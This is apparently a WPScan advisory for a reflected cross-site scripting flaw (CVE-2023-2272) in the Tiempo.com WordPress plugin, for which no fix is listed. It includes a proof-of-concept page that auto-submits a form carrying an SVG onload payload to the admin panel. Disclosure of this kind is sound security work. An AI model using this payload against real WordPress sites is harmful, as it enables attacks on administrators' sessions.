WordPress Plugin Vulnerabilities

Tiempo.com <= 0.1.2 - Reflected XSS

Description

The plugin does not sanitise and escape the page parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php" method="POST">
      <input type="hidden" name="page" value='"><svg/onload=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
tiempocom
No known fix

References

CVE
CVE-2023-2272

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
dba60216-2753-40b7-8f2b-6caeba684b2e

Timeline

Publicly Published
2023-04-25 (about 7 months ago)
Added
2023-04-25 (about 7 months ago)
Last Updated
2023-04-25 (about 7 months ago)

Other

Published
Title
Published
2022-08-08
Title
Simply Schedule Appointments < 1.5.7.7 - Admin+ Stored Cross-Site Scripting
Published
2015-12-02
Title
Role Scoper <= 1.3.66 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Published
2004-12-31
Title
WordPress 1.2-1.2.1 - Multiple Cross-Site Scripting (XSS)
Published
2014-07-02
Title
Dmca Watermarker < 1.1 - XSS
Published
2015-08-24
Title
Manual Image Crop <= 1.10 - Authenticated Reflected Cross-Site Scripting (XSS)